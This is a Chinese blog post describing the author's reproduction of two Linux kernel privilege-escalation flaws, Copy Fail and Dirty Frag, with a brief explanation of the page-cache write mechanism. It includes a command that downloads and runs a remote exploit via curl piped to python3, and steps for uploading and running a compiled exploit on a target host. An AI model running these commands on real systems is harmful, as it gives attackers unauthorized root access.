当前位置: 首页 > news >正文

copy-fail和dirty-frag漏洞

copy-fail和dirty-frag漏洞

CVE-2026-31431-Copy-Fail

项目地址:Copy Fail — CVE-2026-31431

https://github.com/theori-io/copy-fail-CVE-2026-31431

还热乎着还热乎着

正好kali虚拟机坏了 重新装了一个kali2026.1 好像还存在这个漏洞

复现

在linux系统中正常拿到root都是sudo su 然后输入密码

image-20260507235222176

一句话跑脚本

$ curl https://copy.fail/exp | python3 && su

alt text

拿到root权限(以后忘记密码用?)

原理

非特权本地用户可以在 Linux 系统上将 4 个受控字节写入任何可读文件的页面缓存,并利用这些数据获得 root权限。

该漏洞源于 Linux 内核加密子系统 authencesn模块中的一处逻辑缺陷,攻击者仅需本地普通用户权限,通过链式利用 AF_ALG 套接字与 splice()系统调用,即可向页缓存(page cache)写入任意内容,最终实现本地提权至 root。

详细看:Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint

os:叽里咕噜说啥呢 大概是普通用户可以调用AF_ALGsplice() 然后引用啥文件的内核缓存页面 达到写入缓存的效果 再提权(?有时间再问问学长)

影响范围

漏洞利用的是Linux 内核加密模块 authencesn 在2017年引入 所以很多2017年后以linux为内核的系统都存在漏洞

补充

机房上课的时候正好刷到昨天刚出的新洞 想直接试试来着 但是没想到学校虚拟机啥也没有

alt text

万一需要提权的机器啥环境都没有 甚至没有python 现场yum install python3动静也是很大了

https://mp.weixin.qq.com/s/ZYXfYJg-XaWuOxa02BiQfA

公众号文章博主用c重写了一个 开袋即食

# 1. 上传到目标主机
# (通过 wget、curl、scp、webshell 上传等方式均可)
# 2. 赋予执行权限
chmod +x copy_fail_exp
# 3. 执行
./copy_fail_exp

alt text

虽然最后机房虚拟机没连上共享文件夹 没有试试

CVE-2026-43284-Dirty-Frag

项目地址:V4bel/dirtyfrag

热乎到烫手的 白天看长亭公众号还没分配漏洞编号 晚上看github 几小时前才更新了编号

alt text

好像也是通过页面缓存写入实现的提权 但是是调用的xfrm-ESPRxRPC

注意,无论模块是否可用,dirty frag都可以触发。换句话说,即使在采用了公开的copy fail缓解措施(algif_aead黑名单)的系统上,你的Linux仍然容易受到Dirty Frag攻击。

简单复现一下
alt text

可能因为是修改缓存 所以在运行了exp后正常提权也变了(没有红红的root了)

img

但是重启之后就好了

http://www.jsqmd.com/news/779725/

相关文章:

  • 别再只用默认密码了!手把手教你用Hydra和Burp Suite搞定SSH、Web后台的弱口令检测(附实战避坑指南)
  • 【GitHub】skillshare:一条命令同步所有 AI CLI 工具 Skills 的神器
  • 2026年5月江苏废电瓶回收行业盘点与顶尖服务商推荐 - 2026年企业推荐榜
  • 网站安全验证机制与Cloudflare防护技术
  • 锂电池装配产线机械臂路径规划与碰撞检测方法【附程序】
  • 从DeepFuse到Diffusion:7年图像融合顶会论文演进,我的私房笔记与代码实战
  • Digi ConnectCore MP13 SoM:工业级嵌入式系统模块解析
  • 2026年5月更新:河北沧州盐山陶瓷贴片耐磨管道厂家选择,实地考察这几点是关键 - 2026年企业推荐榜
  • 避开这些坑:在Slim Bootloader中集成Intel FSP时的常见配置错误与排查指南
  • 四川盛世钢联国际贸易有限公司钢管频道 -无缝管|焊管|镀锌管|直缝管 - 四川盛世钢联营销中心
  • 告别抓包失败!在雷电模拟器Android 7.1.2上搞定Xposed框架与JustTrustMe模块的保姆级教程
  • 2026年EPC合同纠纷激增,如何选择律师?上海嘉隆所王彦民成行业焦点 - 2026年企业推荐榜
  • 【论文解析】RPCANet++:深度可解释鲁棒PCA稀疏目标分割框架
  • 2026年近期浙江装配线市场洞察:优质制造商如何选择 - 2026年企业推荐榜
  • 2026年Q2宁波金属件喷塑专业选择:深度解析慈溪升隆电器的核心优势 - 2026年企业推荐榜
  • 使用curl命令直接测试Taotoken聊天接口的连通性与响应
  • 【万字长文】CenseoQoE:腾讯开源的图像视频质量评价框架深度解析
  • 2026年5月新发布:探秘宁波华维机械有限公司果筐机智造实力 - 2026年企业推荐榜
  • ARM Trace Buffer架构与调试优化实战
  • 硬件开发如何对抗延迟:构建高速度创新体系的策略与实践
  • 智象科技AI数智员工:重构运维效率的智能引擎
  • 刺客信条:奥德赛风灵月影修改器下载分享2026最新版
  • 09-扩展知识——02. 初识 datetime 模块
  • 2026年5月新发布财务审计服务推荐:宁波海曙英策企业管理咨询有限公司,跨境财务审计合规专家 - 2026年企业推荐榜
  • 嵌入式C/C++编程实战:类型安全与内存管理
  • AI工具集架构设计:统一接口、适配器模式与工程化实践
  • 2026年第二季度硬盘回收市场解析:为何湖南芯源再生科技备受关注 - 2026年企业推荐榜
  • 沈阳口碑好的养发品牌推荐?黑奥秘专利成分矩阵,温和调理脱发白发 - 美业信息观察
  • PromptScript:用TypeScript实现AI提示词工程化与团队协作
  • SON自动添加邻站功能